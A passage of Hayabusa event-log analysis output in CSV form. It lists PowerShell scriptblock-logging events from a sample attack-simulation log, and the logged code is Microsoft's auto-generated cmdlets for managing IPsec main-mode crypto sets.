throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.004 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 